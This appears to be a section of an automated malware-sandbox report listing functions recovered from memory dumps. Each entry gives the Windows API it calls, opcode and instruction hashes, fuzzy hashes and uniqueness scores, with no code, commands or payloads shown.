Opcode ID: 938f3fa7a2bc90c69c49d2b099e5fc4bc2b917c7210036b053cc1e39a1ee03e6
Instruction ID: b0483911746abe24174bf82154be473662454ec851ff77b9f024be90e8386ad3
Opcode Fuzzy Hash: 938f3fa7a2bc90c69c49d2b099e5fc4bc2b917c7210036b053cc1e39a1ee03e6
Instruction Fuzzy Hash: 74224E79E0420DCFCB74DB98D489AAFBBB2BB89310F148155E4126B754CB78E885CB61

Uniqueness

Uniqueness Score: -1.00%

Function 072D1235, Relevance: 1.7, APIs: 1, Instructions: 225timeCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 072D1574

Memory Dump Source

Source File: 0000000D.00000002.485436274.00000000072D0000.00000040.00000001.sdmp, Offset: 072D0000, based on PE: false

Similarity

API ID: SystemTimes
String ID:
API String ID: 375623090-0
Opcode ID: 24c287d7bd9a88370b1794d51da09a9b556f1cd36ec821dab0a19fdc36defd96
Instruction ID: c09c0b967a5560cf2036723f79a95af8470c758c93d4b4ed182f859c13fd2844
Opcode Fuzzy Hash: 24c287d7bd9a88370b1794d51da09a9b556f1cd36ec821dab0a19fdc36defd96
Instruction Fuzzy Hash: 36B1A0B5D0021ACFDB11CF69C880AD9FBB5FF49310F15C69AD958AB201E770AA85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0537DAE4, Relevance: 1.7, APIs: 1, Instructions: 221threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0537E289

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 72925b1f276899bc5570b6de23b470330dc5cec1cb1792448e32d3a59300ca61
Instruction ID: 48aa82d4ab52a2e1fa9931d8363a106109c9d041aeb150e2cdd904ab92afdc8a
Opcode Fuzzy Hash: 72925b1f276899bc5570b6de23b470330dc5cec1cb1792448e32d3a59300ca61
Instruction Fuzzy Hash: AB818B70E002488FDB24DFA9C454AEEBBF9FF88314F14846AE415AB750DB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0644B920, Relevance: 1.7, APIs: 1, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.484388951.0000000006440000.00000040.00000001.sdmp, Offset: 06440000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5c67a71ef49f09ed73d2ad48e9addf8cc65690a3676c90f9492c6f4523a8ee3
Instruction ID: 6131e0f492553c41118269f6ec4119ebc10a4cf54310531ebc155d2ec23de7b3
Opcode Fuzzy Hash: a5c67a71ef49f09ed73d2ad48e9addf8cc65690a3676c90f9492c6f4523a8ee3
Instruction Fuzzy Hash: 318188B1D04249DFEB50EFA9C8816DEBBB5FF48304F20852AD805AB650DB71994ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 0644B9CC, Relevance: 1.6, APIs: 1, Instructions: 144networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 0644BB00

Memory Dump Source

Source File: 0000000D.00000002.484388951.0000000006440000.00000040.00000001.sdmp, Offset: 06440000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 3d5d22970f8106bb434eaa342dece233bd25f013928744c30a6def5f58355f45
Instruction ID: 45f445b92c3aea3ee0266d3bbffdba3f853d6d0c068e7e9aab732cfcfb0b8a09
Opcode Fuzzy Hash: 3d5d22970f8106bb434eaa342dece233bd25f013928744c30a6def5f58355f45
Instruction Fuzzy Hash: 5E5135B0D002589FEB50DFA9C8816DEBBB5FF48304F24842AE804AB654DB709946CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0644A484, Relevance: 1.6, APIs: 1, Instructions: 140networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 0644BB00

Memory Dump Source

Source File: 0000000D.00000002.484388951.0000000006440000.00000040.00000001.sdmp, Offset: 06440000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 14b00a9fbf3cf8ba203ed846f271b7583fc80fd7469827bd57d0aed1d1f786df
Instruction ID: a0a7bbb59e35127d23e5eda8e8c5d950fa6b76a0421041af2c2fe962110e565b
Opcode Fuzzy Hash: 14b00a9fbf3cf8ba203ed846f271b7583fc80fd7469827bd57d0aed1d1f786df
Instruction Fuzzy Hash: BE5133B0D002489FDB50DFA9C8816DEBBB5FF48304F24852AE805AB654DB70A946CF81

Uniqueness

Uniqueness Score: -1.00%

Function 05373474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 053746B1

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c60cf568239023ff28b3b2b874b6defd983b3415a7003ef856379ec10de39cda
Instruction ID: 94be95953f69d16fd88738267a06fd96223040177914656a2c21a0152c9d9743
Opcode Fuzzy Hash: c60cf568239023ff28b3b2b874b6defd983b3415a7003ef856379ec10de39cda
Instruction Fuzzy Hash: 7041DF70C0465CCBDF24DFA9C884BDEBBB5BF49304F208469D409AB251DBB5694ACF94

Uniqueness

Uniqueness Score: -1.00%

Function 053745F4, Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 053746B1

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8bb27352796b9cdbe0ed90e1d1b611070beab93ba4df9d8c0e7ee1e61ec23391
Instruction ID: a3c76c6e65eb3e8876cab6d56dfecf1a980660d852cf52b225c7c2791e1fd61a
Opcode Fuzzy Hash: 8bb27352796b9cdbe0ed90e1d1b611070beab93ba4df9d8c0e7ee1e61ec23391
Instruction Fuzzy Hash: 3941D171C0461CCBDF24DFA9C844BCEBBB5BF49304F208469D408AB251DBB5694ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 05372470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05372531

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: ed705e1f6b8d4999fa05ca6100a361d560f650ef2b259cb5bd9c820389a24c93
Instruction ID: 34c6aec85434138ebcdf74af033cf62e70413954304e97d4d004069691c2825a
Opcode Fuzzy Hash: ed705e1f6b8d4999fa05ca6100a361d560f650ef2b259cb5bd9c820389a24c93
Instruction Fuzzy Hash: 2441FA78D002098FDB14CF99C448AABFBF6FB88314F15C459E519AB721D774A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06447F28, Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 06448001

Memory Dump Source

Source File: 0000000D.00000002.484388951.0000000006440000.00000040.00000001.sdmp, Offset: 06440000, based on PE: false

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 20a45be94caac56cda7ad49fd20bcf8b42dcf4bd10a1092bd4baaadb88298ec1
Instruction ID: abe48894d35e39a7e97fbaf110dd26adf06928e268724757ccc95a55610114f8
Opcode Fuzzy Hash: 20a45be94caac56cda7ad49fd20bcf8b42dcf4bd10a1092bd4baaadb88298ec1
Instruction Fuzzy Hash: B7318C70E10218CFEB64EF69D489B9EBBF5AF48714F15802AE406AB350CB749845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 072D77AC, Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 072D7882

Memory Dump Source

Source File: 0000000D.00000002.485436274.00000000072D0000.00000040.00000001.sdmp, Offset: 072D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 286bfcaaa626807344feaa2c3be94aa330181786f00697aa656f7e94d2c16526
Instruction ID: 0d8886ec6472b173f94a7a3e07ab69ace3bfe41fcaefb3c591554c394948677d
Opcode Fuzzy Hash: 286bfcaaa626807344feaa2c3be94aa330181786f00697aa656f7e94d2c16526
Instruction Fuzzy Hash: 623112B0D2025A9FDB14CFA9D88579EBBF1BB08314F14852AE815E7780D7B89845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 072D4E24, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 072D7882

Memory Dump Source

Source File: 0000000D.00000002.485436274.00000000072D0000.00000040.00000001.sdmp, Offset: 072D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 73ce2ea52c7d38a1b0bb013ce52c6624f41bedc8f16c7ad2afcbe402b0bfb73a
Instruction ID: 44d900dcfb63d9e69a3a727bdd3cafe06266aa9d94a6d97512c415e8f4e8ec35
Opcode Fuzzy Hash: 73ce2ea52c7d38a1b0bb013ce52c6624f41bedc8f16c7ad2afcbe402b0bfb73a
Instruction Fuzzy Hash: 673102B0D2025A9FDB14CFA9D88579EBBF5BB08314F14852AE815E7380D7B89845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0537B888, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0537B957

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 74c2a290cb309deee4bb02a3fbeb9f8d6f6e816882a4b18660e9048ceb93155a
Instruction ID: b898995f8ab9237b324fa7ed55e9f70d33731cb863998c20c8ce47f9ff8c06ab
Opcode Fuzzy Hash: 74c2a290cb309deee4bb02a3fbeb9f8d6f6e816882a4b18660e9048ceb93155a
Instruction Fuzzy Hash: A1318C729043899FCB11DFA9D844ADEBFF8EF49210F18845AE954A7211C339D854DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06447F18, Relevance: 1.6, APIs: 1, Instructions: 81threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 06448001

Memory Dump Source

Source File: 0000000D.00000002.484388951.0000000006440000.00000040.00000001.sdmp, Offset: 06440000, based on PE: false

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 30ed3b24fd54561dd0045e14a1c41c9b6626072520e517d6f2544c8185dbb9e5
Instruction ID: 62f1ea60d1573ae78eff15b7256abc7cd954cb16ddcb1f51052ea0189b91d89a
Opcode Fuzzy Hash: 30ed3b24fd54561dd0045e14a1c41c9b6626072520e517d6f2544c8185dbb9e5
Instruction Fuzzy Hash: 0C318B70E112189FDB64DF68D488BDEBBF5FB48314F15802AE806A7340CB749846CF90

Uniqueness

Uniqueness Score: -1.00%

Function 072D1218, Relevance: 1.6, APIs: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 072D1574

Memory Dump Source

Source File: 0000000D.00000002.485436274.00000000072D0000.00000040.00000001.sdmp, Offset: 072D0000, based on PE: false

Similarity

API ID: SystemTimes
String ID:
API String ID: 375623090-0
Opcode ID: 82016605a13289f775f5dbf7f9efa6a36e41508b6e4ab99c004208e1068ff8ba
Instruction ID: f9d097d1eeeace6e61e2c3d2d98733ad47a748740dba2e457e8f9c9f27d338a6
Opcode Fuzzy Hash: 82016605a13289f775f5dbf7f9efa6a36e41508b6e4ab99c004208e1068ff8ba
Instruction Fuzzy Hash: 243113B1D112499FCB10CFA9C584ADEBBF4BF49310F25816AE848EB601D774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 072D11FB, Relevance: 1.6, APIs: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 072D1574

Memory Dump Source

Source File: 0000000D.00000002.485436274.00000000072D0000.00000040.00000001.sdmp, Offset: 072D0000, based on PE: false

Similarity

API ID: SystemTimes
String ID:
API String ID: 375623090-0
Opcode ID: e89abea96ec6fe38132e384882e56876f623c1ce2b13f584edcd7ccabdf6ed00
Instruction ID: fb87726cbb874c69b65c0b4dfbba7eb89696e5c3cc3f7ed7c82c437c51d99bb8
Opcode Fuzzy Hash: e89abea96ec6fe38132e384882e56876f623c1ce2b13f584edcd7ccabdf6ed00
Instruction Fuzzy Hash: 8E310FB1D112499FCB00CFA9D484ADEBBF4BF49210F25816AE808EB601E7789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0537E6B0, Relevance: 1.6, APIs: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,011153E8,00000000,?), ref: 0537E73D

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c554dcf843ea208e00af5348b2c1b0d87b1f1dfd9ab24654a4ca3d0c2e3cc271
Instruction ID: f6da4303195c87d2b22fdcf8cbde76158549ce3b955acd83b5186519ce93e37d
Opcode Fuzzy Hash: c554dcf843ea208e00af5348b2c1b0d87b1f1dfd9ab24654a4ca3d0c2e3cc271
Instruction Fuzzy Hash: 7E214AB18043499FDB10CFA9D885BDFBFF8EB49320F14849AE854A7641D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0537B8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0537B957

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 31eee02ca8b38ce3b36fe8979f97d8b49b899ff916eaecf0a8233bcfa0788ea5
Instruction ID: 7f71a449f37c83a23921e44085d8224d366094cc39f0f008712c298385dc5ab3
Opcode Fuzzy Hash: 31eee02ca8b38ce3b36fe8979f97d8b49b899ff916eaecf0a8233bcfa0788ea5
Instruction Fuzzy Hash: A31123B18002499FDB10CFAAD844BDEBBF8EF48324F14841AE964A7210C379A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 053732D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,011153E8,00000000,?), ref: 0537E73D

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0c1d87b6e7f7f935ac931d1d82d706d1b1e008ce9b58d9682fa0e4aa5b8ff606
Instruction ID: 2a0637dc0e32e0316c82bf8dfd9eab075de7ff888d559b8a67e73584c07167c3
Opcode Fuzzy Hash: 0c1d87b6e7f7f935ac931d1d82d706d1b1e008ce9b58d9682fa0e4aa5b8ff606
Instruction Fuzzy Hash: BD1125B58003499FDB20CF9AC885BEEBBF8FB48324F10845AE554A7640D378A944DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05371540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0537226A,?,00000000,?), ref: 0537C435

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e62125071df7f129e1cc48fe6fad4d73e94733e1a77bd2aaf5ff57e59ec81674
Instruction ID: ab27eb484eaa2298a3d1cb22886a0164c8c4edf53432b5d5f0ee7b18c3c77e0d
Opcode Fuzzy Hash: e62125071df7f129e1cc48fe6fad4d73e94733e1a77bd2aaf5ff57e59ec81674
Instruction Fuzzy Hash: 1711F5B59003499FDB20CF99D445BDFBBF8FB58324F108419E555A7600C3B8A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0537A548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,0537BC49,?,?,00000000), ref: 0537BCBD

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d969f37d5c8c1f0fa58961b3660494489b110b41d831f79618a9f3f75d949933
Instruction ID: c2ea8dfece1b4aa38c84c7eb990eb18b1581f6439bc494bc3600e485beeb9095
Opcode Fuzzy Hash: d969f37d5c8c1f0fa58961b3660494489b110b41d831f79618a9f3f75d949933
Instruction Fuzzy Hash: 7611E0B59003499FDB20CF99D489BDFBBF8FB48324F10841AE559A7600D3B9A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 053750D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 0537D29D

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 47985ba0866b2a7436f00a542449b810ab910ccc0ded4193f2852611b43f7ee1
Instruction ID: c3ced7010171d8ccf540358f75f981c4925359ff84efb224a145a37c41e4a911
Opcode Fuzzy Hash: 47985ba0866b2a7436f00a542449b810ab910ccc0ded4193f2852611b43f7ee1
Instruction Fuzzy Hash: 0B11E3B58002099FDB20CF99D444BDEBBF8FB48324F108819E955A7600C3B5A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0537D238, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 0537D29D

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e952f3901051ae8afda0bc3a834d1854d78557dee9f9f815e68828d0638966f7
Instruction ID: 9a1ccceaf987e9726c27a050b25c419c909aea9a95b9acd5c45c56b85e31d9f1
Opcode Fuzzy Hash: e952f3901051ae8afda0bc3a834d1854d78557dee9f9f815e68828d0638966f7
Instruction Fuzzy Hash: 3311E0B5C002099FDB10CF99D589BDEBBF8BB48324F14881AE555A7A00C379A5458FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0537C3D0, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0537226A,?,00000000,?), ref: 0537C435

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 254d366690d81210bbfa76f7893a7aec467bfde658914cddf4b3ce1c6ff77b3c
Instruction ID: 5ad194decda8cc5b16721a9ad00668845c81c4067adc4a9cfaa8e53a8f4a785a
Opcode Fuzzy Hash: 254d366690d81210bbfa76f7893a7aec467bfde658914cddf4b3ce1c6ff77b3c
Instruction Fuzzy Hash: 931103B5C003498FDB20CF99C589BEEBBF4FB48324F10841AD455A7600C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0537DC60, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0537F435

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 241416588272ec043ac34eb15e246f11d0772ca6534cacff6e5953a6f3d34462
Instruction ID: 729875e0e8ec467f0eb874ef8627d5496d778a081395358954b284e59cd5e8fd
Opcode Fuzzy Hash: 241416588272ec043ac34eb15e246f11d0772ca6534cacff6e5953a6f3d34462
Instruction Fuzzy Hash: 301103B5D046488FCB20CF99D448BDEBBF4FB48364F14841AE559A7600C378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0537F3D8, Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0537F435

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b1e1bac9cd7d80e55db24e6091cb00d0502db48e68825180594125e1396f938b
Instruction ID: 3f2110d9fafbc757f4f92f6b8e321a0d43a2769707d987ec91320eb8b367e5cd
Opcode Fuzzy Hash: b1e1bac9cd7d80e55db24e6091cb00d0502db48e68825180594125e1396f938b
Instruction Fuzzy Hash: 631100B5D002488FCB20CFAAD449BDEBFF8FB49324F14841AE559A7600C779A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0537BC59, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,0537BC49,?,?,00000000), ref: 0537BCBD

Memory Dump Source

Source File: 0000000D.00000002.482660313.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 67e46f3ab6f2c9a9bb01812ec7559ec3aba6ef3b345faf5262b568c17526029a
Instruction ID: 13577b1b15c9a313820341cb8126a727f74573a31e16d3fa345d3dbcbf2e465b
Opcode Fuzzy Hash: 67e46f3ab6f2c9a9bb01812ec7559ec3aba6ef3b345faf5262b568c17526029a
Instruction Fuzzy Hash: 9011BDB59007498FDB20CF99D585BDFBBF8FB48324F14841AE959A7600D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 075E1332, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fafe75fcd218a867ba2be8e7a3be38ffaab28f5a1ce910f8b537bdfd38a9189
Instruction ID: 47a5146024bd9755e8a989edfabaa71c59413c57f4e4572147790c483d80a699
Opcode Fuzzy Hash: 4fafe75fcd218a867ba2be8e7a3be38ffaab28f5a1ce910f8b537bdfd38a9189
Instruction Fuzzy Hash: 2A01D8A030859E5BD718927D582079FB9DBEBDA744F29892ED14BCF785CD248C0243B6

Uniqueness

Uniqueness Score: -1.00%

Function 075E14F8, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e06a63d7a900d21c49fca5628724fc61b54309332d9b7acf706cdbfdaba1d84
Instruction ID: 92f33a97b2a1226a01921baca2fcd7d901c52b8d995f40d053138fe236e2a6bb
Opcode Fuzzy Hash: 3e06a63d7a900d21c49fca5628724fc61b54309332d9b7acf706cdbfdaba1d84
Instruction Fuzzy Hash: A90149717092549BC31417ADA8550E6BBBDFF8651531884FFE05B8B752CE72CC02C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 075E06C0, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda91520fac75bc248c4243a6c267c5f291dfd79ae4a54aeab11532a59e6d872
Instruction ID: c33765344b54736e33995ece41f39effe41748b5fa6140ba4b49f29ff97393ee
Opcode Fuzzy Hash: dda91520fac75bc248c4243a6c267c5f291dfd79ae4a54aeab11532a59e6d872
Instruction Fuzzy Hash: 20018872B40A254B8728DA78D9409A773DAEF88614314C63ED54ACB784EF75EC4287C4

Uniqueness

Uniqueness Score: -1.00%

Function 075E14B0, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61f6c04108b3b6ff2c734ebb220505a8a12273e1e995dd681414aa305d45f04
Instruction ID: ebfdddcea77a575249b67d47ecb772f87e3b047dc8c591add3f5276b8378263b
Opcode Fuzzy Hash: d61f6c04108b3b6ff2c734ebb220505a8a12273e1e995dd681414aa305d45f04
Instruction Fuzzy Hash: 60014CB1609B584FC72A879954110E5BBBCAF4711530884DFD44A8FE42D7719841C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 075E0640, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e437effd3167a55c429ee4fcf9a5f5bc81b6377fcc0552b705e55b0955dbc6ca
Instruction ID: 96fc29af9abc1746e6be4fac02875333a050e55b32d2f5fbc881e10468601e75
Opcode Fuzzy Hash: e437effd3167a55c429ee4fcf9a5f5bc81b6377fcc0552b705e55b0955dbc6ca
Instruction Fuzzy Hash: 1F0149713097400FC31AA739686059EBBE6EFC511431589BED54ECF792DF125D0A47E2

Uniqueness

Uniqueness Score: -1.00%

Function 075E077A, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b26920e312cd0b93e9ab98870400810da09322bba99d24ebcf6f0f57286d51b4
Instruction ID: 97a5f2003e59650c7959d039f8d30be2fc965d8fe68122c2f2f83d35b3874064
Opcode Fuzzy Hash: b26920e312cd0b93e9ab98870400810da09322bba99d24ebcf6f0f57286d51b4
Instruction Fuzzy Hash: 60F059753007509FC7159B38D0585DA7BE9EF89320B0505A6E88AC7792CB29FC01C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 075E0630, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e93d9926033972f85e403fb67de0ee5cca8a2af63196144e534d38a8fcbdc76
Instruction ID: a179558004848ddad52231889a7bd400198a25a679fccc58b2c87caf5b518a7c
Opcode Fuzzy Hash: 1e93d9926033972f85e403fb67de0ee5cca8a2af63196144e534d38a8fcbdc76
Instruction Fuzzy Hash: A8F0E9723057415B97299B6ED450486FBE9FFC5210301457AD94CCB116D721BC0547E1

Uniqueness

Uniqueness Score: -1.00%

Function 075E14E8, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a8697fc1e61889b6b4d0441bebb3d3b5563de5b268e948a04e2023fae61057
Instruction ID: efe02c292adb0c70735b9fc37d511c381b04437c748958e4f7a18b7187ccd5bc
Opcode Fuzzy Hash: 90a8697fc1e61889b6b4d0441bebb3d3b5563de5b268e948a04e2023fae61057
Instruction Fuzzy Hash: 5AF05CF26097688FC71747A8D0240E6BBBCFF0312972888DBD1564FA52C732D802CB51

Uniqueness

Uniqueness Score: -1.00%

Function 075E13D0, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1354d340e7f6f0ba8f7a00eeb4b41aa1e1dbcb13f5cc1beed6b555ac86d260fd
Instruction ID: 812453506b70846f58fad248b4a3ff2c732c5e670b48992316f680f0ac5faf42
Opcode Fuzzy Hash: 1354d340e7f6f0ba8f7a00eeb4b41aa1e1dbcb13f5cc1beed6b555ac86d260fd
Instruction Fuzzy Hash: 9CE0ABF090834CDFD71D8B20E8106EA3B3DB705700F14C982F0176A281CBB118428761

Uniqueness

Uniqueness Score: -1.00%

Function 075E0788, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.485650987.00000000075E0000.00000040.00000001.sdmp, Offset: 075E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a0d20ff389a606233b643883aafbe754e787a018bdc1dffc43a369190d0188b
Instruction ID: 4c34b252753802f8e100dfeecaae35509ff01f489c7916a363fd95d48459daa6
Opcode Fuzzy Hash: 5a0d20ff389a606233b643883aafbe754e787a018bdc1dffc43a369190d0188b
Instruction Fuzzy Hash: 5FE0C23A700A208B97295A55E4496EE73EE9FC8620B00426AAC4AC3781CF3CAD0186E1

Uniqueness

Uniqueness Score: -1.00%

Function 075E1402, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

